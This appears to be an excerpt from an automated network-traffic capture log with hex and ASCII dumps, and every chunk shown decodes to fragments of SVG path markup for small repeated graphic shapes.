                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15890INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15906INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15922INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15938INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15954INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15970INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15986INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16002INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16018INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16034INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16050INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16066INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16082INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16098INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16733INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16749INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16765INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
